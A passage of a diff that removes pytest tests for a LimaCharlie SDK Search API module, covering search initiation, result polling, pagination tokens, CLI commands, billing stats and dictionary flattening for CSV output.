-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-        manager._apiCall = Mock(return_value={'queryId': 'query-123'})
-
-        for stream in ['event', 'detect', 'audit', None]:
-            manager.initiateSearch('test', 1000, 2000, stream=stream)
-
-            call_args = manager._apiCall.call_args
-            raw_body = call_args[1]['rawBody']
-            request_data = json.loads(raw_body.decode())
-
-            if stream is None:
-                assert 'stream' not in request_data
-            else:
-                assert request_data['stream'] == stream
-
-    def test_initiate_search_api_error(self):
-        """Test initiate search with API error."""
-        from limacharlie import Manager
-        from limacharlie.utils import LcApiException
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock API error
-        manager._apiCall = Mock(side_effect=LcApiException('API Error: Rate limit exceeded', code=429))
-
-        with pytest.raises(LcApiException) as exc_info:
-            manager.initiateSearch('test', 1000, 2000)
-
-        assert 'Rate limit exceeded' in str(exc_info.value)
-        assert exc_info.value.code == 429
-
-
-class TestSearchAPIPollResults:
-    """Test polling result scenarios."""
-
-    def test_poll_results_empty_results(self):
-        """Test polling with empty results."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        empty_response = {
-            'completed': True,
-            'results': [],
-            'nextToken': None
-        }
-        manager._apiCall = Mock(return_value=empty_response)
-
-        result = manager.pollSearchResults('query-123')
-
-        assert result['completed'] == True
-        assert result['results'] == []
-        assert result.get('nextToken') is None
-
-    def test_poll_results_various_next_poll_times(self):
-        """Test polling with various nextPollInMs values."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Test with different poll times
-        poll_times = [100, 500, 1000, 5000]
-
-        for poll_ms in poll_times:
-            responses = [
-                {'completed': False, 'nextPollInMs': poll_ms},
-                {'completed': True, 'results': []}
-            ]
-            manager._apiCall = Mock(side_effect=responses)
-
-            with patch('time.sleep') as mock_sleep:
-                result = manager.pollSearchResults('query-123', poll_interval=1)
-
-                # Verify sleep was called with appropriate time
-                mock_sleep.assert_called()
-                sleep_duration = mock_sleep.call_args[0][0]
-                # Should use the larger of poll_ms/1000 or poll_interval
-                expected = max(poll_ms / 1000.0, 1)
-                assert sleep_duration == expected
-
-    def test_poll_results_with_empty_token(self):
-        """Test polling with empty string token (treated as None)."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-        manager._apiCall = Mock(return_value={'completed': True, 'results': []})
-
-        # Empty string token should be treated same as None
-        result = manager.pollSearchResults('query-123', token='')
-
-        call_args = manager._apiCall.call_args
-        query_params = call_args[1]['queryParams']
-
-        # Empty token should not be included in query params
-        assert 'token' not in query_params or query_params['token'] == ''
-
-    def test_poll_results_gradual_completion(self):
-        """Test polling that gradually completes."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Simulate gradual completion
-        responses = [
-            {'completed': False, 'nextPollInMs': 100},
-            {'completed': False, 'nextPollInMs': 200},
-            {'completed': False, 'nextPollInMs': 300},
-            {'completed': False, 'nextPollInMs': 400},
-            {'completed': True, 'results': [{'data': 'final'}]}
-        ]
-        manager._apiCall = Mock(side_effect=responses)
-
-        with patch('time.sleep'):
-            result = manager.pollSearchResults('query-123', max_attempts=10)
-
-        assert result['completed'] == True
-        assert len(result['results']) == 1
-        assert manager._apiCall.call_count == 5
-
-
-class TestSearchAPIExecute:
-    """Test complete search execution scenarios."""
-
-    def test_execute_search_with_different_result_types(self):
-        """Test executeSearch with various result types."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Test different result structures
-        # Note: nextToken is in the LAST result object
-        result_types = [
-            # Events
-            [{'type': 'events', 'rows': [{'event_id': '1'}], 'nextToken': None}],
-            # Facets
-            [{'type': 'facets', 'facets': [{'name': 'hostname', 'count': 10}], 'nextToken': None}],
-            # Timeline
-            [{'type': 'timeline', 'timeseries': [{'timestamp': 1234567890, 'value': 5}], 'nextToken': None}],
-            # Mixed
-            [
-                {'type': 'events', 'rows': [{'event_id': '1'}], 'nextToken': None},
-                {'type': 'facets', 'facets': [{'name': 'user', 'count': 3}], 'nextToken': None}
-            ]
-        ]
-
-        for result_structure in result_types:
-            manager.pollSearchResults = Mock(return_value={
-                'completed': True,
-                'results': result_structure
-            })
-
-            results = list(manager.executeSearch('test', 1000, 2000))
-
-            assert len(results) == len(result_structure)
-
-    def test_execute_search_large_result_set(self):
-        """Test executeSearch with many pages."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Simulate 10 pages of results
-        # Note: nextToken is in the LAST result object of each page
-        page_count = 10
-        poll_responses = []
-
-        for i in range(page_count):
-            is_last = (i == page_count - 1)
-            results_list = []
-
-            # Create 100 items per page
-            for j in range(100):
-                result_obj = {'page': i, 'item': j}
-                # Put nextToken in the LAST result object
-                if j == 99:  # Last item in this page
-                    result_obj['nextToken'] = None if is_last else f'token-page-{i+1}'
-                else:
-                    result_obj['nextToken'] = None
-                results_list.append(result_obj)
-
-            poll_responses.append({
-                'completed': True,
-                'results': results_list
-            })
-
-        manager.pollSearchResults = Mock(side_effect=poll_responses)
-
-        results = list(manager.executeSearch('test', 1000, 2000))
-
-        # Should have 10 pages * 100 items = 1000 results
-        assert len(results) == 1000
-        # Verify pollSearchResults was called 10 times
-        assert manager.pollSearchResults.call_count == 10
-
-    def test_execute_search_with_stream_parameter(self):
-        """Test executeSearch passes stream parameter correctly."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': []
-        })
-
-        # Test with different streams
-        for stream in ['event', 'detect', 'audit']:
-            list(manager.executeSearch('test', 1000, 2000, stream=stream))
-
-            # Verify initiateSearch was called with correct stream
-            call_kwargs = manager.initiateSearch.call_args[1]
-            assert call_kwargs['stream'] == stream
-
-    def test_execute_search_early_termination(self):
-        """Test executeSearch when generator is not fully consumed."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Set up multiple pages
-        # Note: nextToken is in the LAST result object of each page
-        page1_results = []
-        for i in range(100):
-            result_obj = {'id': i}
-            if i == 99:  # Last result
-                result_obj['nextToken'] = 'token-2'
-            else:
-                result_obj['nextToken'] = None
-            page1_results.append(result_obj)
-
-        page2_results = []
-        for i in range(100, 200):
-            result_obj = {'id': i}
-            if i == 199:  # Last result
-                result_obj['nextToken'] = 'token-3'
-            else:
-                result_obj['nextToken'] = None
-            page2_results.append(result_obj)
-
-        page3_results = []
-        for i in range(200, 300):
-            result_obj = {'id': i}
-            if i == 299:  # Last result
-                result_obj['nextToken'] = None
-            else:
-                result_obj['nextToken'] = None
-            page3_results.append(result_obj)
-
-        poll_responses = [
-            {'completed': True, 'results': page1_results},
-            {'completed': True, 'results': page2_results},
-            {'completed': True, 'results': page3_results}
-        ]
-        manager.pollSearchResults = Mock(side_effect=poll_responses)
-
-        # Only consume first 50 results
-        results = []
-        for i, result in enumerate(manager.executeSearch('test', 1000, 2000)):
-            results.append(result)
-            if i >= 49:  # Stop after 50 results
-                break
-
-        assert len(results) == 50
-        # Should only have called pollSearchResults once (first page)
-        assert manager.pollSearchResults.call_count == 1
-
-    def test_execute_search_custom_polling_config(self):
-        """Test executeSearch with custom polling configuration."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': []
-        })
-
-        # Execute with custom settings
-        list(manager.executeSearch(
-            'test',
-            1000,
-            2000,
-            max_poll_attempts=500,
-            poll_interval=5
-        ))
-
-        # Verify custom settings were passed to pollSearchResults
-        call_kwargs = manager.pollSearchResults.call_args[1]
-        assert call_kwargs['max_attempts'] == 500
-        assert call_kwargs['poll_interval'] == 5
-
-
-class TestSearchAPICLIExtended:
-    """Extended CLI command tests."""
-
-    def test_cli_validate_with_time_formats(self, capsys):
-        """Test validate command with various time formats."""
-        from limacharlie.SearchAPI import main
-
-        time_formats = [
-            ('now-1h', 'now'),
-            ('2025-12-30', '2025-12-31'),
-            ('1234567890', '1234567900'),
-        ]
-
-        for start, end in time_formats:
-            with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-                mock_manager = MagicMock()
-                mock_manager_class.return_value = mock_manager
-
-                mock_manager.validateSearch.return_value = {
-                    'query': 'test',
-                    'estimatedPrice': {'value': 0.01, 'currency': 'USD'}
-                }
-
-                # Run with this time format
-                main(['validate', '-q', 'test', '-s', start, '-e', end])
-
-                # Verify validateSearch was called with parsed timestamps
-                mock_manager.validateSearch.assert_called_once()
-                call_args = mock_manager.validateSearch.call_args[0]
-
-                # Both should be integers (timestamps)
-                assert isinstance(call_args[1], int)
-                assert isinstance(call_args[2], int)
-
-    def test_cli_execute_with_stream_option(self, capsys):
-        """Test execute command with stream option."""
-        from limacharlie.SearchAPI import main
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            mock_manager.executeSearch.return_value = iter([])
-
-            for stream in ['event', 'detect', 'audit']:
-                main(['execute', '-q', 'test', '-s', '1000', '-e', '2000', '--stream', stream])
-
-                call_kwargs = mock_manager.executeSearch.call_args[1]
-                assert call_kwargs['stream'] == stream
-
-    def test_cli_execute_with_custom_poll_settings(self, capsys):
-        """Test execute command with custom polling settings."""
-        from limacharlie.SearchAPI import main
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            mock_manager.executeSearch.return_value = iter([])
-
-            main([
-                'execute',
-                '-q', 'test',
-                '-s', '1000',
-                '-e', '2000',
-                '--max-poll-attempts', '500',
-                '--poll-interval', '5'
-            ])
-
-            call_kwargs = mock_manager.executeSearch.call_args[1]
-            assert call_kwargs['max_poll_attempts'] == 500
-            assert call_kwargs['poll_interval'] == 5
-
-    def test_cli_execute_pretty_output(self, capsys):
-        """Test execute command with pretty output."""
-        from limacharlie.SearchAPI import main
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            # Mock executeSearch with properly structured results
-            mock_manager.executeSearch.return_value = iter([
-                {
-                    'type': 'events',
-                    'rows': [{'event_id': '1', 'data': 'test'}],
-                    'nextToken': None,
-                    '_page_number': 1,
-                    '_first_of_type_in_page': True,
-                    '_billing_stats': {}
-                }
-            ])
-
-            main(['execute', '-q', 'test', '-s', '1000', '-e', '2000', '--pretty'])
-
-            captured = capsys.readouterr()
-
-            # Pretty output should have indentation
-            assert '  "event_id"' in captured.out or '    "event_id"' in captured.out
-
-    def test_cli_validate_with_error(self, capsys):
-        """Test validate command handling validation errors."""
-        from limacharlie.SearchAPI import main
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            mock_manager.validateSearch.return_value = {
-                'query': 'invalid',
-                'error': 'Syntax error in query'
-            }
-
-            with pytest.raises(SystemExit) as exc_info:
-                main(['validate', '-q', 'invalid', '-s', '1000', '-e', '2000'])
-
-            assert exc_info.value.code == 1
-
-            captured = capsys.readouterr()
-            assert 'Syntax error in query' in captured.err
-
-    def test_cli_execute_with_api_exception(self, capsys):
-        """Test execute command handling API exceptions."""
-        from limacharlie.SearchAPI import main
-        from limacharlie.utils import LcApiException
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            mock_manager.executeSearch.side_effect = LcApiException('API Error')
-
-            with pytest.raises(LcApiException):
-                main(['execute', '-q', 'test', '-s', '1000', '-e', '2000'])
-
-    def test_cli_validate_invalid_time_format(self, capsys):
-        """Test validate command with invalid time format."""
-        from limacharlie.SearchAPI import main
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            with pytest.raises(SystemExit) as exc_info:
-                main(['validate', '-q', 'test', '-s', 'invalid-time', '-e', 'now'])
-
-            assert exc_info.value.code == 1
-
-            captured = capsys.readouterr()
-            assert 'Error parsing time' in captured.err
-
-    def test_cli_execute_no_results(self, capsys):
-        """Test execute command with no results."""
-        from limacharlie.SearchAPI import main
-
-        with patch('limacharlie.SearchAPI.Manager') as mock_manager_class:
-            mock_manager = MagicMock()
-            mock_manager_class.return_value = mock_manager
-
-            # Return empty iterator
-            mock_manager.executeSearch.return_value = iter([])
-
-            main(['execute', '-q', 'test', '-s', '1000', '-e', '2000'])
-
-            captured = capsys.readouterr()
-            # Check for event row count (should be 0)
-            assert 'Event rows: 0' in captured.err
-
-
-class TestSearchAPIIntegration:
-    """Integration-style tests combining multiple components."""
-
-    def test_full_workflow_validate_then_execute(self):
-        """Test full workflow: validate, then execute."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Step 1: Validate
-        manager._apiCall = Mock(return_value={
-            'query': 'event_type = NEW_PROCESS',
-            'estimatedPrice': {'value': 0.01, 'currency': 'USD'}
-        })
-
-        validation = manager.validateSearch('event_type = NEW_PROCESS', 1000, 2000)
-        assert validation['estimatedPrice']['value'] == 0.01
-
-        # Step 2: Execute
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [{'event_id': '1', 'nextToken': None}]
-        })
-
-        results = list(manager.executeSearch('event_type = NEW_PROCESS', 1000, 2000))
-        assert len(results) == 1
-
-    def test_pagination_with_mixed_result_sizes(self):
-        """Test pagination with varying result sizes per page."""
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        # Mock the _getSearchUrl method
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Different sized pages
-        # Note: nextToken is in the LAST result object of each page
-        def create_page(count, next_token):
-            results = []
-            for i in range(count):
-                result_obj = {'id': i}
-                if i == count - 1:  # Last result
-                    result_obj['nextToken'] = next_token
-                else:
-                    result_obj['nextToken'] = None
-                results.append(result_obj)
-            return {'completed': True, 'results': results}
-
-        poll_responses = [
-            create_page(100, 'token-2'),
-            create_page(50, 'token-3'),
-            create_page(200, 'token-4'),
-            create_page(10, None)
-        ]
-        manager.pollSearchResults = Mock(side_effect=poll_responses)
-
-        results = list(manager.executeSearch('test', 1000, 2000))
-
-        # Total: 100 + 50 + 200 + 10 = 360 results
-        assert len(results) == 360
-        assert manager.pollSearchResults.call_count == 4
-
-
-class TestPaginationPersistence:
-    """Test pagination persistence features."""
-
-    def test_execute_search_with_resume_token(self):
-        """
-        Test executing search with resume_token to skip already-processed pages.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-
-        # Mock poll response with results
-        poll_response = {
-            'completed': True,
-            'results': [
-                {
-                    'type': 'events',
-                    'rows': [{'event': 'data'}],
-                    'nextToken': None
-                }
-            ]
-        }
-        manager.pollSearchResults = Mock(return_value=poll_response)
-
-        # Execute with resume_token (should skip initiation)
-        results = list(manager.executeSearch(
-            "event_type = NEW_PROCESS",
-            1234567890,
-            1234567900,
-            query_id="existing-query-id",
-            resume_token="resume-token-123"
-        ))
-
-        # Verify pollSearchResults was called with the resume token
-        assert manager.pollSearchResults.call_count == 1
-        call_args = manager.pollSearchResults.call_args
-        assert call_args[1]['token'] == "resume-token-123"
-
-        # Verify results were yielded
-        assert len(results) == 1
-        assert results[0]['type'] == 'events'
-
-    def test_on_page_completed_callback(self):
-        """
-        Test that on_page_completed callback is called with correct arguments.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock two pages of results
-        page1_response = {
-            'completed': True,
-            'results': [
-                {
-                    'type': 'events',
-                    'rows': [{'event': '1'}],
-                    'nextToken': 'token-page-2'
-                }
-            ]
-        }
-        page2_response = {
-            'completed': True,
-            'results': [
-                {
-                    'type': 'events',
-                    'rows': [{'event': '2'}],
-                    'nextToken': None  # Last page
-                }
-            ]
-        }
-        manager.pollSearchResults = Mock(side_effect=[page1_response, page2_response])
-
-        # Track callback invocations
-        callback_calls = []
-        def on_page_completed(page_number, next_token):
-            callback_calls.append((page_number, next_token))
-
-        # Execute search
-        results = list(manager.executeSearch(
-            "test query",
-            1234567890,
-            1234567900,
-            on_page_completed=on_page_completed
-        ))
-
-        # Verify callback was called twice (once per page)
-        assert len(callback_calls) == 2
-        assert callback_calls[0] == (1, 'token-page-2')  # First page with token
-        assert callback_calls[1] == (2, None)  # Last page without token
-
-    def test_on_query_initiated_callback(self):
-        """
-        Test that on_query_initiated callback receives the query_id.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'new-query-id-456'})
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [{'type': 'events', 'rows': [], 'nextToken': None}]
-        })
-
-        # Track query_id
-        received_query_id = [None]
-        def on_query_initiated(query_id):
-            received_query_id[0] = query_id
-
-        # Execute search
-        list(manager.executeSearch(
-            "test query",
-            1234567890,
-            1234567900,
-            on_query_initiated=on_query_initiated
-        ))
-
-        # Verify callback received the query_id
-        assert received_query_id[0] == 'new-query-id-456'
-
-    def test_resume_with_query_id_skips_initiation(self):
-        """
-        Test that providing query_id skips search initiation.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock()  # Should not be called
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [{'type': 'events', 'rows': [], 'nextToken': None}]
-        })
-
-        # Execute with existing query_id
-        list(manager.executeSearch(
-            "test query",
-            1234567890,
-            1234567900,
-            query_id="existing-id"
-        ))
-
-        # Verify initiateSearch was NOT called
-        manager.initiateSearch.assert_not_called()
-
-
-class TestCancelSearch:
-    """Test cancelSearch functionality."""
-
-    def test_cancel_search_basic(self):
-        """
-        Test basic cancelSearch operation.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager._apiCall = Mock(return_value={'cancelled': True})
-
-        # Cancel a search
-        result = manager.cancelSearch('query-id-123')
-
-        # Verify DELETE request was made
-        manager._apiCall.assert_called_once()
-        call_args = manager._apiCall.call_args
-        assert call_args[0][0] == 'search/query-id-123'
-        assert call_args[0][1] == 'DELETE'
-        assert call_args[1]['altRoot'] == 'https://search.test/v1'
-
-        # Verify response
-        assert result == {'cancelled': True}
-
-
-class TestNextTokenExtraction:
-    """Test nextToken extraction from last result object."""
-
-    def test_next_token_from_last_result(self):
-        """
-        Test that nextToken is extracted from the last result object.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock response with multiple results and nextToken in LAST result
-        page1_response = {
-            'completed': True,
-            'results': [
-                {'type': 'events', 'rows': [{'e': '1'}], 'nextToken': None},  # First result
-                {'type': 'events', 'rows': [{'e': '2'}], 'nextToken': None},  # Middle result
-                {'type': 'events', 'rows': [{'e': '3'}], 'nextToken': 'next-page-token'}  # LAST result
-            ]
-        }
-        page2_response = {
-            'completed': True,
-            'results': [
-                {'type': 'events', 'rows': [{'e': '4'}], 'nextToken': None}
-            ]
-        }
-
-        manager.pollSearchResults = Mock(side_effect=[page1_response, page2_response])
-
-        # Execute search
-        list(manager.executeSearch("test", 123, 456))
-
-        # Verify second poll was called with token from LAST result
-        assert manager.pollSearchResults.call_count == 2
-        second_call = manager.pollSearchResults.call_args_list[1]
-        assert second_call[1]['token'] == 'next-page-token'
-
-    def test_no_token_when_empty_results(self):
-        """
-        Test pagination stops when results array is empty.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': []  # Empty results
-        })
-
-        # Execute search
-        results = list(manager.executeSearch("test", 123, 456))
-
-        # Verify only one poll (no pagination)
-        assert manager.pollSearchResults.call_count == 1
-        assert len(results) == 0
-
-
-class TestBillingStats:
-    """Test billing stats extraction and metadata."""
-
-    def test_billing_stats_in_result_metadata(self):
-        """
-        Test that billing stats are included in result metadata.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock response with stats
-        poll_response = {
-            'completed': True,
-            'stats': {
-                'bytesScanned': 1024000,
-                'eventsScanned': 5000,
-                'eventsMatched': 100,
-                'eventsProcessed': 100,
-                'estimatedPrice': {'value': 0.0025, 'currency': 'USD'}
-            },
-            'results': [
-                {'type': 'events', 'rows': [{'e': '1'}], 'nextToken': None}
-            ]
-        }
-        manager.pollSearchResults = Mock(return_value=poll_response)
-
-        # Execute search
-        results = list(manager.executeSearch("test", 123, 456))
-
-        # Verify stats are in metadata
-        assert len(results) == 1
-        assert '_billing_stats' in results[0]
-        stats = results[0]['_billing_stats']
-        assert stats['bytesScanned'] == 1024000
-        assert stats['eventsScanned'] == 5000
-        assert stats['estimatedPrice']['value'] == 0.0025
-
-
-class TestCSVFlatteningWithDynamicFields:
-    """Test CSV output with dynamic fields."""
-
-    def test_flatten_dict_with_slash_separator(self):
-        """
-        Test that flatten_dict uses / separator for nested keys.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        nested_dict = {
-            'data': {
-                'event': {
-                    'COMMAND_LINE': 'cmd.exe',
-                    'USER_NAME': 'admin'
-                },
-                'routing': {
-                    'parent': 'sensor-123'
-                }
-            },
-            'simple_field': 'value'
-        }
-
-        flattened = flatten_dict(nested_dict)
-
-        # Verify slash separator
-        assert 'data/event/COMMAND_LINE' in flattened
-        assert 'data/event/USER_NAME' in flattened
-        assert 'data/routing/parent' in flattened
-        assert 'simple_field' in flattened
-
-        # Verify values
-        assert flattened['data/event/COMMAND_LINE'] == 'cmd.exe'
-        assert flattened['data/event/USER_NAME'] == 'admin'
-        assert flattened['data/routing/parent'] == 'sensor-123'
-        assert flattened['simple_field'] == 'value'
-
-    def test_flatten_dict_with_lists(self):
-        """
-        Test that lists are converted to JSON strings.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        dict_with_list = {
-            'tags': ['tag1', 'tag2', 'tag3'],
-            'nested': {
-                'array': [1, 2, 3]
-            }
-        }
-
-        flattened = flatten_dict(dict_with_list)
-
-        # Verify lists are JSON strings
-        assert flattened['tags'] == '["tag1", "tag2", "tag3"]'
-        assert flattened['nested/array'] == '[1, 2, 3]'
-
-    def test_flatten_dict_empty_dict(self):
-        """
-        Test that empty dict returns empty dict.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        flattened = flatten_dict({})
-        assert flattened == {}
-
-    def test_flatten_dict_with_none_values(self):
-        """
-        Test that None values are converted to empty strings.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        dict_with_none = {
-            'field1': None,
-            'nested': {
-                'field2': None,
-                'field3': 'value'
-            }
-        }
-
-        flattened = flatten_dict(dict_with_none)
-
-        # None values should become empty strings
-        assert flattened['field1'] == ''
-        assert flattened['nested/field2'] == ''
-        assert flattened['nested/field3'] == 'value'
-
-    def test_flatten_dict_with_empty_lists(self):
-        """
-        Test that empty lists are converted to JSON strings.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        dict_with_empty_list = {
-            'empty': [],
-            'nested': {
-                'also_empty': []
-            }
-        }
-
-        flattened = flatten_dict(dict_with_empty_list)
-
-        assert flattened['empty'] == '[]'
-        assert flattened['nested/also_empty'] == '[]'
-
-    def test_flatten_dict_deeply_nested(self):
-        """
-        Test deeply nested structures.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        deep_dict = {
-            'level1': {
-                'level2': {
-                    'level3': {
-                        'level4': {
-                            'level5': 'deep_value'
-                        }
-                    }
-                }
-            }
-        }
-
-        flattened = flatten_dict(deep_dict)
-
-        assert flattened['level1/level2/level3/level4/level5'] == 'deep_value'
-
-    def test_flatten_dict_custom_separator(self):
-        """
-        Test using custom separator.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        nested_dict = {
-            'parent': {
-                'child': 'value'
-            }
-        }
-
-        flattened = flatten_dict(nested_dict, sep='.')
-        assert flattened['parent.child'] == 'value'
-
-        flattened_underscore = flatten_dict(nested_dict, sep='_')
-        assert flattened_underscore['parent_child'] == 'value'
-
-    def test_flatten_dict_with_numbers(self):
-        """
-        Test that numeric values are converted to strings.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        dict_with_numbers = {
-            'int_val': 42,
-            'float_val': 3.14,
-            'nested': {
-                'zero': 0,
-                'negative': -100
-            }
-        }
-
-        flattened = flatten_dict(dict_with_numbers)
-
-        assert flattened['int_val'] == '42'
-        assert flattened['float_val'] == '3.14'
-        assert flattened['nested/zero'] == '0'
-        assert flattened['nested/negative'] == '-100'
-
-    def test_flatten_dict_with_booleans(self):
-        """
-        Test that boolean values are converted to strings.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        dict_with_bools = {
-            'is_active': True,
-            'is_deleted': False,
-            'nested': {
-                'enabled': True
-            }
-        }
-
-        flattened = flatten_dict(dict_with_bools)
-
-        assert flattened['is_active'] == 'True'
-        assert flattened['is_deleted'] == 'False'
-        assert flattened['nested/enabled'] == 'True'
-
-    def test_flatten_dict_with_special_characters(self):
-        """
-        Test that special characters in keys are preserved.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import flatten_dict
-
-        dict_with_special = {
-            'field-with-dash': 'value1',
-            'field_with_underscore': 'value2',
-            'nested': {
-                'field.with.dots': 'value3'
-            }
-        }
-
-        flattened = flatten_dict(dict_with_special)
-
-        assert flattened['field-with-dash'] == 'value1'
-        assert flattened['field_with_underscore'] == 'value2'
-        assert flattened['nested/field.with.dots'] == 'value3'
-
-
-class TestResultTypeOrdering:
-    """Test that results are ordered by type (timeline, facets, events)."""
-
-    def test_results_sorted_by_type(self):
-        """
-        Test that results within a page are sorted: timeline → facets → events.
-
